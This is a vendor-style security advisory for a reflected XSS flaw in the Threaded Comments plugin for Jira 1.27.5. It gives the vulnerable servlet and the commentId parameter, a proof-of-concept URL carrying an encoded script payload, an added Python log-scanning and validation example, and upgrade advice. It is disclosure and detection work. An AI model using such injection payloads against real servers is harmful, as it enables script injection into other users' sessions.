Threaded Comments

Jira default comments are pretty basic. Have you ever wished for more functionality?

Threaded Comments adds these useful features to make your comments easier and more informative:

  • Facebook-like thread conversation experience - make comments more friendly and readable

  • Reply button - directly respond to a comment

  • Like/dislike button - acknowledge with one-click

  • List of people who like/dislike - see who is on your side (wink)

  • Project-based configurations - it’s your call which projects to enable the plugin for

Security Report - Threaded Comments for Jira - Ver 1.27.5
An XSS vulnerability was found in Threaded Comments for Jira, version 1.27.5, that allows remote attackers to inject arbitrary HTML or JavaScript.

Vulnerable URL:

https://secure.server.com/plugins/servlet/threaded-comments/helper?commentId=12345%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

Description:

An XSS vulnerability was found in Threaded Comments for Jira, version 1.27.5.

It allows remote attackers to inject arbitrary HTML or JavaScript.

Threaded Comments API: /plugins/servlet/threaded-comments/helper

Vulnerable parameter: commentId

POC: https://secure.server.com/plugins/servlet/threaded-comments/helper?commentId=12345%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
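The only legitimate form of commentId on this endpoint is a numeric Jira comment id, so a defender can both validate the parameter server-side and sweep access logs for helper-servlet requests whose commentId is anything else. The following is an added example, not the plugin's code; the log lines are constructed samples and the path and parameter name are the ones given above.

```python
"""Detection/validation helper for the Threaded Comments helper-servlet XSS.

Added example (not the plugin's or Atlassian's code). It flags requests to
/plugins/servlet/threaded-comments/helper whose commentId is not a plain
integer, which is the only value a real Jira comment id ever takes.
"""
import re
from typing import List, Tuple
from urllib.parse import parse_qs, urlsplit

HELPER_PATH = "/plugins/servlet/threaded-comments/helper"
COMMENT_ID_RE = re.compile(r"^\d{1,19}$")  # Jira comment ids are numeric (assumption: <= 19 digits)
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format); not from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Sep/2021:10:01:02 +0000] "GET /plugins/servlet/threaded-comments/helper?commentId=12345 HTTP/1.1" 200 512
10.0.0.9 - - [14/Sep/2021:10:01:07 +0000] "GET /plugins/servlet/threaded-comments/helper?commentId=12345%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E HTTP/1.1" 200 640
10.0.0.9 - - [14/Sep/2021:10:01:09 +0000] "GET /browse/PROJ-1 HTTP/1.1" 200 2048
"""


def comment_id_is_valid(value: str) -> bool:
    """Server-side check: accept only the integer a real comment id would be."""
    return bool(COMMENT_ID_RE.match(value))


def suspicious_requests(log_text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, decoded commentId) for helper-servlet hits with a malformed id."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != HELPER_PATH:
            continue
        # parse_qs percent-decodes the values, so the raw payload is visible here.
        for value in parse_qs(parts.query, keep_blank_values=True).get("commentId", []):
            if not comment_id_is_valid(value):
                hits.append((line.split(" ", 1)[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}: malformed commentId {value!r}")
```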


Recommendation:

Upgrade to the latest version of Threaded Comments:

Version 1.33.0 for Jira Server and Jira Data Center 8.0.0 - 8.18.2

Released: Aug 9th, 2021

Document date: 14th September 2021